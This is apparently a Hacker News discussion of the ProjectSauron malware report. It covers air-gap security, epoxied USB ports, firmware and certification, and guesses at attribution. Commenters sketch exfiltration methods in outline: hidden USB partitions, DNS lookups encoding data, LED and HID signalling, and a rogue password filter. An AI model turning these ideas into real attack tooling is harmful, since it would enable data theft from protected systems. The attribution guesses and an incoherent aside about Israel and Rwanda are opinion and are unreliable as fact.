There is also a market for routers and other devices which are produced as much as possible in US (are they rolling their own capacitors I am wondering...). I saw some of those devices come with a 100x markup. $400 device from China vs $40k from US. Those who sell the $40k know how hard it is get on the list they are milking it for all its worth (the sales person was quite frank about it).
It was also funny to see "Windows" as an approved security blessed OS and then Debian, Ubuntu, OpenBSD rejected (with only ancient version of RHEL's approved for Linux).
And 7 despite being out for 3 years? is still not certified.
And we all laughed at PS/2 keyboards and mouseeses
Basically, the device connected to the keyboard port has to reply with code 0x65 when it's initialized, then the BIOS will read some bytes into memory and jump to it. Not sure whether this was brought forward to newer models or clones, though so it's just some fun trivia...
It's like I read that malware could infect your "internet of things" thermostat and then hackers could remotely turn off your heat until you pay ransom. Just put the dang thermostat code in ROM. Power cycle, goodbye malware.
For more critical stuff, just have it regularly power cycle itself.
Which, of course, is the whole point. If ROMs do cost more, I bet people who want secure systems would be quite willing to pay a bit extra.
It would be too expensive to put an OS in ROM, but the ROMs could contain the hashes of the OS on disk, and can verify the disk image before booting.
And besides, why would I want over-the-air updates to my freakin' thermostat?
Anyone trying to compromise the device would then require physical access.
Update buttons ain't a good replacement for TPM hardware.
For the end user, it’s extremely easy to NOT push that button.
In many cases that would probably be prohibitively expensive, but for a thermostat or a light switch, it should not be that difficult to do.
ROMs are not unfixable. They do require physical access, though, which eliminates nearly all of the risk.
Physical-access-only updates: yes please. We know what the security boundary is on those, and how to reset it.
After all, if attacks can target A, B, or C, that is no excuse to not fix B.
Not true at all.
Even if the boot device is read-only, it would be a huge challenge to build any kind of system without these vulnerable components.
There's a huge market for secure items - routers, cars, thermostats, medical devices, avionics, ATMs, etc. I simply don't understand why ROMs aren't used.
I've seen government systems running Windows (USA), Mac (USA) but the strangest I've seen is SUSELinux (Germany). I have no idea how they got SUSE approved when Red Hat is more "American" but some agencies don't have to follow the rules.
At least that is how I remember it.
Novell bought Suse, then Novell merged with Attachemate, in the process Suse became a business unit (wholly owned company?) under Attachemate, then there was a merger between Attachemate and Micro Focus in 2014.
Anyways, i suspect that as Suse is FOSS, and was initially Germany based, and now is UK based, both being NATO allies, that DOD has few issues with continued usage.
From what is seen on the geopolitical landscape, Germany is a vassal state of the US.
In any real security environment, humans are poison. Period, end of story. This is not an issue exclusive to open-source.
Closed source does not mean obscurity–– and open source does not mean clarity (see OpenSSL, that one Linux 2.6 thing¹, etc).
It's not like being proprietary suddenly means the only security is through obscurity. Why do you think that? Are you just a zealot? Did you not consider that closed source software could be well-engineered and secure? You're welcome to read about some of the security features in Windows NT² (that article is a bit old but still relevant), which are considerably more thorough than (non-SE)Linux (I think SELinux has auditing now, so it's at least comparable to NT).
Now, don't get me wrong, I generally prefer open-source tools (for a variety of reasons) and tend to trust them more, but saying stupid stuff like you are just gives open source a bad name.
On top of that, obscurity is a perfectly valid layer of security. To use a mediocre analogy, of course you want your safe to be strong enough that nobody could break in even if it's in plain sight—but it's certainly not a bad idea to hide the safe as well.
Is there something more subtle I'm missing?
‘Open source’ is more about the development model (and freedoms) than about the nature of ‘knowing what the software is doing’.
Heck, I could argue that Linux is a black box to most people who aren't well-versed in kernel development. OpenSSL is notoriously difficult to understand. Sometimes huge bugs look relatively innocent¹ even with people looking at the code.
¹ e.g. https://lwn.net/Articles/341773/
But reproducible builds are a hard problem, so… honestly, I can't answer that.
This seems apocryphal. Its trivial to disable USB for a mass storage (or all devices) via things like group policy or other security controls. Or disable the controller. Those USB ports aren't perfect boxes, the epoxy would just run out all over the place. More than likely you'd have an OS-level security policy and bios block, which is trivial to do in a managed environment.
I hear this type of story from time to time and frankly its the sysadmin version of "he hacked us with a visual basic gui!"
>$400 device from China vs $40k from US.
I'd rather trust my network with a warrantied Cisco with same-day replacement than a $400 Abibaba sourced ROUTER PLUS SHENZEN SPECIAL with two weeks delivery. I suspect you've never managed a non-trivial network before, let alone one with real security policy if you'd consider running that and thinking you're secure.
The question is - where do you stop? The controller could be re-enabled from a lower level, etc. The rabbit hole goes very deep. Sometimes it's best to just take control of the physical layer and call it a day.
> Those USB ports aren't perfect boxes, the epoxy would just run out all over the place.
Epoxy putty would work pretty well, and it's widely available.
Every motherboard is going to have that option in a slightly different place, but if you can put epoxy in one USB port you're pretty well set for any piece of hardware.
Consider another instance of the problem: verifying that your webcam isn't being used to spy on you. Since a surprising number of hardware designers were negligent and made that software controllable it is orders of magnitude easier to simply deploy a piece of tape than try to prove that malware hasn't disabled the status LED:
How much skill and diligence does it take to confirm that you have disabled the controller using each manufacturer's interface (if they even have one documented), that there isn't some way to re-enable it later (or that something like a sleep/resume cycle didn't reset the controller), and that all of that continues to be true for every subsequent configuration change or software/firmware update?
I would suggest that any organization with this level of risk would be better off paying someone $15/hour to check the ports along with the rest of their physical status checks and put the security engineers in charge of other improvements with a higher return.
If you are paranoid enough or have actual reason to believe somebody would want to invade your network, epoxy is one way you can be really certain no one can hijack your network via an infected USB flash drive.
EDIT: Of course, if gluing the USB ports shut is all you do stop attackers, I am pretty much begging for trouble. And as somebody pointed out, disconnecting the USB ports from the main board, possibly disabling the pins is probably a better idea, as well as disabling the USB controller in firmware and locking the BIOS / setup, if it is part of a ... let's say comprehensive approach to securing your network.
If you want to stop your every day user from plugging in USB drives then this is probably all you need to do.
In a scenario where you're concerned about insider threats with even a minimal level of computing knowledge, you have to lock down the BIOS and the OS layer as well.
"Oh the IT guy put epoxy in the USB ports, guess I'll just take the case off and plug into the USB ports on the motherboard"
I have a friend that worked at LLNL and she used to talk about secured laptops having their USB ports epoxied and the traces physically cut on the camera and microphones to help secure them. I think even the wifi and bluetooth were disabled as well.
After hearing these stories, it made me chuckle at Zuckerberg's masking tape.
Long time ago, I've briefly managed an environment like that. It was crazy. Kids are really good at breaking stuff in creative ways.
In a managed environment you could do it via the BIOS trivially, which is most likely locked as well. I mean, glueing the ports is especially stupid. You can chip glue off with your fingers or a key. If you're doing physical things to the PC, you'd most likely just remove the USB header from the mb and call it a day. Pop-open the case the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous. Ignoring the OS security policy is ridiculous. Ignoring BIOS controls is ridiculous. Ignoring how security is handled in managed environments is ridiculous.
It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.
I imagine some middle-manager asshole asked for a piece of plastic to block the panel to make it 'look nice and remind people they're blocked' and some paper-pusher took it as "OMG THEY GLUED THE PORTS TO STOP HACKERS" He was just ignorant of how IT security is really done.
I think its obvious HN is mostly web-devs, not sysadmins or security people if stuff like this is widely believed and comments contrary to it get instant 'disagree downvotes.' If you think the NSA and the DoD just glue ports instead of doing real security, then I don't know what to say here.
> In a managed environment you could do it via the BIOS trivially, which is most likely locked as well.
The BIOS may still not be low-level enough. There is nothing preventing a buggy xhci controller, chipset, BIOS, etc, from being exploited by a rogue USB device. It would be prudent to disable USB in the BIOS AND physically disable the ports somehow.
> Pop-open the case the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous.
You do not need epoxy to fully cure, you only need it to reach a point where the viscosity is high enough that enough of it won't drain out of the USB port when you turn the computer on its side. This can easily be under 5 minutes, depending on the type of epoxy and you could even trivially avoid that wait time by putting a piece of tape over the epoxied port. It may also even be cheaper to implement, since you can pay someone minimum wage to fill ports with epoxy, but it takes a slightly higher skill level to do work inside of computer cases. Additionally, it's easier to visually verify that all USB ports are epoxied than it is to verify that all internal USB connectors have been disconnected. Additionally, consider that many motherboards have rear USB ports directly soldered onto the motherboard, which would take far more effort and skill to disconnect than it would to just fill the port with epoxy.
> It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.
An attacker who has broken into the government building is not the person who this is intended to guard from. It is intended to guard from employees accidentally inserting compromised USB devices into their computers. If the attacker is opening your computer case, they have many more options than USB ports for delivering an exploit payload. Though it's also very likely that these cases are also physically locked and have case intrusion detection enabled. Not that those protections are particularly difficult to get around either. This may also even help IT avoid support phone calls from users saying "hey, how come my USB port doesn't work?" where epoxy in the ports shows some serious intent.
Additionally, in the case of a real attacker who has physically entered the building, and intends to deliver their payload by flash drive: formerly they could just waltz by some computer, pop a drive in, and walk away. Now they'd need to at the very least open the case, which at the very least makes it take slightly longer for them to deliver their payload, and is much more likely to draw suspicion.
Anyway, you know the discussion has gone down the rathole when you're debating the relative merits of epoxy recipes for securing computers. :)
I have no reason to believe the person I worked with would make it up. There would just be no point in it.
> Its trivial to disable USB for a mass storage (or all devices)
Except there are hundreds of different kinds of devices, and you tasked with quickly "doing something to fix the problem". Do you have time to go and dig through different types of BIOS menus or open the cases to all of the machines. Or is it easier to get epoxy plungers and send an army of people from desk to desk. Normal epoxy is a pretty decent electrical insulator (some board or components used to even be dipped in epoxy to protect from environmental damage or tempering).
> I suspect you've never managed a non-trivial network before,
No, but I was selling a solution with one in it. And $40k was making a decent size cut in the profit margin.
That said, I could see glueing a panel to block them as a visual to remind people that those ports are off, but not as a primary blocking device. More than likely its done via security policy.
So, whether or not you believe that it is a useful solution, it certainly did happen. As for alternatives to gluing, I assume that was time related: filling in a port is certainly faster than opening thousands of machines to give them a physical port-ectomy.
Because it was more of a reminder for stupidity. "Oh, look there is glue in there, that's right we not supposed to stick random USB devices in there". If the machine is on their desk, yes, they could plug in a PCI device that has an USB thing on it and still connect. But by that point they are really going out of their way, they are opening the case and such, and it will be very hard to maintain the idea that it was just a stupid mistake.
It also really is not trivial to chip off most types of even general-purpose epoxy with your finger on a flat surface, let alone a tiny USB port which your finger doesn't fit in. If the epoxy was selected with some level of care, it may be very, very time consuming, or nearly impossible to remove, even with the right tools.
No matter what, it's a helpful measure in addition to every other way you can also disable a USB port.
If you have company critical secrets or life-safety systems, you need to air gap where possible.
That's you're job. You cannot stop or prevent attacks, and if option don't have the metrics and logs, the FBI won't be able to do anything, assuming you can get them to give a shit.
So ... does anyone, perhaps who doesn't have Kaspersky's business interests to protect, care to actually speculate? In other cases it's been seemingly well-known in the security community which APT attacks trace back to which countries, it's just apparently impolite to say it in public.
Russia+Iran suggests a western actor. Their biggest shared interest is Syria, I'd think. And look, the Syrian conflict is on since March '11, and the activity according to Kaspersky reaches back to June '11. I'd say that's quite close.
Neither the US nor Europe were that deeply invested in Syria. There is, however, one small middle-east country that has quite an interest in the entire region, and also isn't friends with Iran or Russia. And it just so happens that Israel is somewhat of a close affiliation of Rwanda.
None of that is in any way conclusive, but it certainly is probable.
Actually Israel is on very friendly terms with Russia. There are a ton of Russian immigrants in Israel to the point that Putin called them "Russian ambassadors".
It didn't start that way - part of the history of the creation of the modern state of Israel is Russia vs US proxy conflict (of sorts) via Egypt. But it's not like that anymore, not for a long time.
(The US and Russia have moved on to other proxies :)
Alternatively, one of the infected nations could also be responsible. Infecting selected systems inside your border could be a way to deflect attention when the hunt for the malware' authors began.
Pure speculation on my part, and nothing particularly new.
Not suggesting anything, just keep that in mind.
This likely means the USA, a US ally like Israel, or a growing power such as China or India.
But the USA is the most likely candidate.
But in our current security environment, what if these walls become necessary for secure computing? By analogy, there's a reason that many ancient cities were circled by a wall.
Walls around cities were likely very poor at stopping small, stealthy groups of infiltrators. They were designed for much more brute force attacks. Apple's walled garden helps quite a bit with the deluge of crap that would be available without it. Without it there would be an order of magnitude more crap (in quantity and quality). That said, there's a vibrant black market for people that can't stand the oppressive policies of Apple.
Additionally, once you have a wall in place, it's easy to make a decision to tax certain types of traffic through it because the capability is now there, whether or not it's in the best economic interest of the people inside. Apple didn't skimp on this area. The wall was erected with tithes and taxation in mind, and collection booths at all the gates.
So, does it help? Well, it prevents roving bands of bandits from riding in, terrorizing and robbing the people unlucky enough to be in their path, and making a hasty exit, so yes, but if you're a tasty enough target, getting past the wall isn't really a problem. There are myriad ways to do that as long as you're careful. For example, the numerous secret tunnels through the wall. They aren't large, and they are constantly being filled in by the city engineers, but there's always some they haven't found if you are willing to ask the right people (or dig your own).
Okay, I believe I've tortured this analogy enough...
In a world where all phones are loosely controlled Android derivates competing on slim profit margins, is anyone going to make the drive for hard hardware-enabled crypto? And even if they wanted to, could they afford it?
Sure. I wasn't making a case that taxation at the wall is bad, but that it has the capability to be bad. We use regulation in (mostly) free markets to greater or lesser success to steer the markets in some manner. If you accept that pure capitalism doesn't necessarily yield an optimally performing system when people are involved, then that ability to influence the market is a useful capability, especially when applied judiciously. A blanket rate isn't necessarily the most efficient form of that, but it is a way to raise revenue.
> In a world where all phones are loosely controlled Android derivates
I think you've already stacked the starting conditions to the point where it's not really worthwhile to consider. That situation would be ripe for disruption in some manner, because I think it's inherently unstable. All it takes is a small niche market for alternatives that do make choices based on privacy, or security, and events that spur interest in those topics, and the larger population of providers will need to respond appropriately or risk ceding a increasingly large portion of the market to those that do.
As you note, not sure a unipolar outcome would ever be stable enough to have persisted, but I wouldn't have expected a bipolar arrangement either. And I can imagine a market structure that would have depressed manufacturer profits far enough so as to preclude serious R&D / innovation on their parts.
I swear to God I'd put adblock on that laptop to reduce this risk. Not to mention there must have been multiple click throughs for the different hurdles to install the malware. This is not a problem I envisage happening on Mums iPad though, and there's a lot to be said for that piece of mind
For all of their known (and probable) capabilities, our three-letter agencies don't seem too concerned about encouraging defensive technologies and securing domestic networks.
I'm not personally worried about what Chinese and Russian hackers know about me, because none of that information is particularly useful for taking valuables from me. I am curious what your experience is, just so I can understand the context of your concern.
Also at personal risk is anyone with a US security clearance:
...because I just described how Debian worked for the last 20 years.
The reason I ask is because there's actually value in spreading the rumor that a capability like this exists. Imagine if your adversary believed that you could gain access to their computers even when they're not connected to the internet. They'd run themselves in circles trying to secure everything!
In general, I believe this article to be true, but would love to learn more of the details.
>What would ProjectSauron have cost to set up and run?
>Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars.
Simply, the goals ant he methods of the commercial malware are fundamentally different to those that can be recognized in the state-sponsored malware.
Have a google around for Stuxnet; a fairly advanced piece of malware which went after Iranian nuclear enrichment centrifuges. It used five previously unreported Microsoft vulnerabilities and a bunch of fairly advanced techniques including jumping airgaps like ProjectSauron does via USB.
There are samples of Stuxnet kicking about, if you want to take a look yourself there's nothing stopping you. Although, you may be there a while.
Obviously that's a tremendous pain to work with, because you're limited to PS/2 keyboards and mice (etc etc), but given that there's no way of authenticating USB devices and they've already been used in various attacks, a serious airgap protocol has to ban USB ports.
You could quite easily hide a USB mass storage device inside a mouse, or with a bit more work have an unmodified mouse with a spare Flash area used for data exfiltration.
(Firewire is even worse, and Thunderbolt lets you onto the PCI bus)
This is slightly too strong – it should be “has to ban unsecured USB ports”. By 2002 or so, people I met who worked at SPAWAR were advising conference attendees to follow their standard practice of epoxying necessary USB devices to the computer and completely filling unused ports. That moved USB into the same difficulty class as other physical access attacks, which they were already depending on building security to restrict.
Also note that while it's true that Firewire and Thunderbolt are definitely still riskier, newer versions of Windows, OS X, and Linux can use the IO-MMU to prevent DMA attacks. That started shipping in OS X 10.7 and Windows 8.1 (only when locked) and OS X 10.8 enables that all of the time for hardware made around 2012 and later.
In fact, all of this would work equally well with a PS/2 port.
AFAIK one could mitigate something like this by really restrictive udev rules only allowing certain usb drivers on certain usb ports (like no usb msc on the port dedicated for keyboard only).
If they're serious enough about finding 0 days and exploits to the USB or OS to load this shit any physical access to the box itself is off limits.
Consider what someone with the time, skill, and access to do that could also do without that: opening the case and directly installing some sort of device, planting a camera which records you typing passwords in (“oops, left my cellphone sitting out. Won't happen again!”), planting a radio receiver which opens up all sorts of side channel attacks, installing a passive network tap, etc.
A guard with a metal detector and strict limits on what you can bring into the building or what tools you can use inside is going to do a better job preventing all of those.
If a userland program can get at the raw HID interface, that can also be used for exfiltration to a tailored device.
xset led named 'Scroll Lock'
What's left? Optical media? Or are we seriously reduced to a human with two computers reading from one and typing into the other?
"The library was masquerading as a Windows password filter, which is something administrators typically use to ensure passwords match specific requirements for length and complexity. The module started every time a network or local user logged in or changed a password, and it was able to view passcodes in plaintext."
What really scares me are things that can live in firmware; not just on mass storage drives but also in host system firmware. We've let too many dragons breed in dark places in the name of Digital Restrictions Management.
Part of what makes ProjectSauron so impressive is its ability to collect data from air-gapped computers. To do this, it uses specially prepared USB storage drives that have a virtual file system that isn't viewable by the Windows operating system. To infected computers, the removable drives appear to be approved devices, but behind the scenes are several hundred megabytes reserved for storing data that is kept on the air-gapped machines. The arrangement works even against computers in which data-loss prevention software blocks the use of unknown USB drives.
Second, making partitions that windows doesn't see is trivially easy. I went out of my way to buy a 128gb flash drive nearly 10 years ago at great expense, it had a 4gb fat 32 partition which is what Windows would see.
It had an 16gb Linux partition with 8gb of that being an encrypted partition
I installed a bootloader that allowed it to be switched to if plugged in when any computer was starting up
The other 100gb you ask? Another partition....
Are we talking "partitions Windows wont mount because they aren't FAT/NTFS" or "partitions that literally do not show up to Windows Disk Management because the disk itself is showing a different capacity. EG: A 16GB USB reporting only 8GB, regardless of the OS installed"
Like one of these, only malicious
A hidden WiFi to create a mesh network, or use ultrasound, seems doable.
> Kaspersky researchers still aren't sure precisely how the USB-enabled exfiltration works. The presence of the invisible storage area doesn't in itself allow attackers to seize control of air-gapped computers. The researchers suspect the capability is used only in rare cases and requires use of a zero-day exploit that has yet to be discovered. In all, Project Sauron is made up of at least 50 modules that can be mixed and matched to suit the objectives of each individual infection.
You remarkably have the exact exfil method when that's not disclosed information?
> Data exfiltration and real-time status reporting using DNS requests.
Sorry to be more specific we spoke on DNS Base Exfil using base64 encoded strings in DNS Lookups and also how to use DNS records to control botnets.
So not exact and only part of their method.
Due to how the industry works, they're usually correct.
At least in the US, publicly traded tech companies are accountable to shareholders: There's some transparency in the accounting, and it's hard for them to throw millions of dollars at a problem before shareholders start asking tough questions.
It says that the CD, containing data about a recent research expedition, was mailed to an academic. It was apparently intercepted in the mail, compromised, and forwarded on.
Also, this thing was running as a local admin on a domain controller. So either the DC's weren't patched or some zero-days were used. Or perhaps an inside job.
As I understand it, airgapped systems are not in the habit of bringing software updates across the airgap, so unpatched everything is likely.
If the WSUS server were also air-gapped, then you're in the business of manually downloading each update, verifying it, and copying it to over to the air-gapped WSUS server offline.
Microsoft's Windows Update servers have also been compromised in the past. Depending on the level of security you're operating at, taking new windows updates on your air-gapped systems may require having someone decompile and review each update.
In general, being air-gapped prevents infinitely more exploits than windows updates could ever possibly cure; that is, until one of your admins uses his admin privileges to disable the USB port restrictions for 5 minutes that one time to copy that one file quickly so he can go home for the day. For this, there are epoxied USB ports.
To nitpick, domain controllers don't have local accounts at all. It was probably running as SYSTEM which equates to the domain controller's computer account for AD.
If I wanted to own a machine and not be detected, that's where I'd live. It's also complex and closed source so you are basically guaranteed to have exploitable bugs that won't be fixed. It has access to network and system busses at a layer below the OS so ex-filtrating can be done at a layer below what the OS can see.
For a project this big & complex, and for something that cost hundreds of millions of dollars to develop, 5 years is paltry. Duqu remained hidden for 11+ years.
It doesn't seem as though this has been especially effective with regards to information security, however. There are just too many adversaries, it's too hard to project force against them, and there's not much of an effective deterrent effect by sitting on a 'stockpile' of vulnerabilities yourself.
But IMO the disconnect is almost a fundamental one, because it's an area where what has worked fairly well for the US for 60+ years is suddenly falling flat.
One good example from recent times of how well this type of "incentive" works is Google and Stagefright. The media went nuts over Stagefright affecting virtually all Android devices - and for good reason, too.
Since then Google seems to be taking Android security way more seriously, and there have been a lot of serious security improvements in Android (7.0) over the past year.
But these sort of actions seem to happen in slow motion, if at all, when there isn't a hacking/malware catastrophe for which the companies can get blamed in the press.
The NSA pushed hard for new surveillance laws such as CISA with the promise that it's what they need to keep us safe against cyberattacks. So why isn't every single media entity blaming the NSA over every major new data breach that happened since then?
At this point I'd argue Google's security bounties have done more to secure the industry.
NIST seems like a good agency trying to do the right things. It's just that they're forced to work with bad actors.
In terms of the "narrow scope" assertion: http://csrc.nist.gov/publications/PubsSPs.html
"Department of Defence" is so PC, things were much more honest back when it it was called the "Department of War"
If you want regulation, that's Congress and POTUS, not the NSA.
We honestly don't know. It might not even be the NSA.
Why is advanced technology automatically assumed to have the backing of nation-states? Cant several highly motivated and smart individuals create the technology without a nation-state behind them?
You need to look at things like the complexity of the malware, how many staff it would take to develop and maintain it operationally, the targets selected and what sort of payloads are executed.
Criminals tend to have simpler malware that used known exploits or a small number of zero days.
They generally cast a wide net for their targets and their payloads typically aim to directly raise funds(ransom, mining, card theft, etc).
In contrast, nation-states tend to have complex malware with multiple zero days, greater care is taken to avoid detection, their targets are chosen carefully and their payloads focus on gathering information and specialized operations.
A more cynical view would be that many security firms sell both security and forensics/surveillance. One of those two product lines has to be fundamentally defective.
Is the position that hackable endpoints are a good compromise supportable any longer? Or has it bitten US entities in the ass enough that making truly secure computing a reality for computer users, even if it blinds the surveillance state, becomes the new goal.
1. endpoints are vulnerable because they are exceptionally hard to secure,
2. and attacking endpoints can be targeted and specific,
the governments case that weakening encryption is necessary for warranted search is weak. Even with strong encryption the government can exploit the targeted communicant's endpoint to learn either the plaintext or the encryption keys. This isn't a compromise so much as a statement of reality and what is likely to remain reality for some time to come. Weakening encryption, for the most part, provides benefits to the government in the form of mass surveillance, but for a variety of reasons doesn't offer much benefit in the form of limited, specific searches.
>making truly secure computing a reality for computer users,
We can make endpoints more secure, but I see no path to endpoint security that will keep out a determined well resourced adversary.
Feels more like political sabre-rattling to get the public to eventually condone a future attack from our homeland shores of Oceania against the evil Eastasia or Eurasia.
Compare the mass of malware that is out there with the level of technical sophistication, OPSEC to prevent detection, and precise targeting of its victims. Along with other big name malwares (i.e. Stuxnet, Flame, etc.), this class of malware is very precise in its objective. It isn't trying to make money for its owners. It isn't trying to replicate itself across the internet endlessly. Rather it has a key objective of infecting a specific set of networks. So when researchers call out the fact that it is likely to be "state sponsored", they are saying the purpose of the malware is very different than your average piece of malware.
For example, suppose that this exploit involved the reversal of an MD5 hash (and this is simply an example, I'm not saying that the actual exploit did). How much computing power would be required to do this? I couldn't do this reliably on my home machine, nor could I afford the cloud-compute power to perform it. However, assembling a vast array of machines is within reach of a state sponsored intelligence agency.
So, that's often it: at some point, the computation would be so expensive that you'd have to infer that only a nation state could have financed it.
Yes, it is possible.
Interested to see what hosting company in the US they used.
Bribes always help.
It looks like this is probably referring to EAL .
In a market with a large number of vendors interacting with a large number of relatively unknowledgeable buyers, an oversight team is going to try to find a certification to give guidance (and ass covering).
Yes, this is a barrier to entry, but it's also a learned behaviour as buyers get repeatedly burned.
I would argue that this is equivalent to requiring your plumbers and electricians to be licensed.